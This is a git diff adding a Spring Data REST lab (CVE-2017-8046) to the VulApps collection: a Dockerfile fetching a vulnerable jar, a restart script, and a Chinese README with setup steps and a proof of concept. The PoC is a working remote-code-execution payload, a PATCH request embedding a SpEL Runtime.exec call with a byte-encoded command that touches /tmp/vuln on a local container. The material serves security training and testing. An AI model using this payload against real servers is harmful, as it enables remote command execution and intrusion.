diff --git a/README.md b/README.md index 1720398..29a68ff 100644 --- a/README.md +++ b/README.md @@ -114,6 +114,7 @@ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037 * [Samba](./s/samba/) * [Shiro](./s/shiro/) * [SSH](./s/ssh/) +* [Spring](./s/spring/) * [Spring Boot](./s/springboot/) * [Struts2](./s/struts2/) * [Spring WebFlow](./s/springwebflow/) diff --git a/s/README.md b/s/README.md index 452798e..a5c2dd3 100644 --- a/s/README.md +++ b/s/README.md @@ -3,6 +3,7 @@ * [Samba](./samba/) * [Shiro](./shiro/) * [SSH](./ssh/) +* [Spring](./spring/) * [Spring Boot](./springboot/) * [Struts2](./struts2/) * [Spring WebFlow](./springwebflow/) diff --git a/s/spring/1/Dockerfile b/s/spring/1/Dockerfile new file mode 100644 index 0000000..2a556e4 --- /dev/null +++ b/s/spring/1/Dockerfile @@ -0,0 +1,15 @@ +FROM openjdk:8-jdk +MAINTAINER Medici.Yan@Gmail.com + +ENV JAR_URL http://vulapps.poetn.cc/s/spring/spring-data-rest/spring-data-rest-cve-2017-8046.jar + +COPY src/start.sh /start.sh + +RUN set -x \ + && chmod a+x /start.sh \ + && mkdir /htdocs \ + && wget -qO /htdocs/ROOT.jar $JAR_URL + +EXPOSE 8080 + +CMD ["/start.sh"] diff --git a/s/spring/1/README.md b/s/spring/1/README.md new file mode 100644 index 0000000..3d8b290 --- /dev/null +++ b/s/spring/1/README.md @@ -0,0 +1,68 @@ +## Spring Data REST PATCH请求代码执行漏洞(CVE-2017-8046) + +### 漏洞信息 + + * [CVE-2017-8046: RCE in PATCH requests in Spring Data REST](https://pivotal.io/security/cve-2017-8046) + * [这个Spring高危漏洞,你修补了吗?-- 其河@美团点评技术团队](https://mp.weixin.qq.com/s/uTiWDsPKEjTkN6z9QNLtSA) + +### 获取环境: + +1. 拉取镜像到本地 + + ``` +$ docker pull medicean/vulapps:s_spring_1 + ``` + +2. 启动环境 + + ``` +$ docker run -d -p 8080:8080 medicean/vulapps:s_spring_1 + ``` + > `-p 8080:8080` 前面的 8080 代表物理机的端口,可随意指定。 + +### 使用与利用 + +访问 `http://你的 IP 地址:端口号/`, 假设启动的端口号为 8080 + +#### PoC + +1. 访问 `http://127.0.0.1:8080/`,测试服务是否启动成功 + + > 第一次启动时会下载 mongodb,网速慢的可能要多等一会儿 + + ![](https://github.com/Medicean/VulApps/raw/master/s/spring/1/poc-1.png) + +2. 利用 POST 请求添加一个数据 + + ``` + POST /persons HTTP/1.1 + Host: 127.0.0.1:8080 + Content-Type: application/json + Cache-Control: no-cache + + {"firstName": "VulApps", "lastName": "VulApps"} + ``` + ![](https://github.com/Medicean/VulApps/raw/master/s/spring/1/poc-2.png) + +3. 执行 PoC + + 执行命令为: `/usr/bin/touch /tmp/vuln`,注意 Content-Type 值为 `application/json-patch+json` + +``` +PATCH /persons/1 HTTP/1.1 +Host: 127.0.0.1:8080 +Content-Type: application/json-patch+json +Cache-Control: no-cache +Content-Length: 228 + +[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,47,116,109,112,47,118,117,108,110}))/lastName", "value": "vulapps-demo" }] +``` + ![](https://github.com/Medicean/VulApps/raw/master/s/spring/1/poc-3.png) + +4. 进入容器,发现成功创建文件 + + ![](https://github.com/Medicean/VulApps/raw/master/s/spring/1/poc-4.png) + +### 参考链接 + +* [这个Spring高危漏洞,你修补了吗?-- 其河@美团点评技术团队](https://mp.weixin.qq.com/s/uTiWDsPKEjTkN6z9QNLtSA) diff --git a/s/spring/1/poc-1.png b/s/spring/1/poc-1.png new file mode 100644 index 0000000..4fc2e03 Binary files /dev/null and b/s/spring/1/poc-1.png differ diff --git a/s/spring/1/poc-2.png b/s/spring/1/poc-2.png new file mode 100644 index 0000000..dd04ea7 Binary files /dev/null and b/s/spring/1/poc-2.png differ diff --git a/s/spring/1/poc-3.png b/s/spring/1/poc-3.png new file mode 100644 index 0000000..ea680f9 Binary files /dev/null and b/s/spring/1/poc-3.png differ diff --git a/s/spring/1/poc-4.png b/s/spring/1/poc-4.png new file mode 100644 index 0000000..f77c9bd Binary files /dev/null and b/s/spring/1/poc-4.png differ diff --git a/s/spring/1/src/start.sh b/s/spring/1/src/start.sh new file mode 100644 index 0000000..d543b3d --- /dev/null +++ b/s/spring/1/src/start.sh @@ -0,0 +1,5 @@ +#!/bin/bash +while [[ true ]]; do + java -jar /htdocs/ROOT.jar + sleep 5 +done diff --git a/s/spring/README.md b/s/spring/README.md new file mode 100644 index 0000000..287ce19 --- /dev/null +++ b/s/spring/README.md @@ -0,0 +1,3 @@ +# Spring + +* [Spring Data REST PATCH请求代码执行漏洞(CVE-2017-8046)](./1/)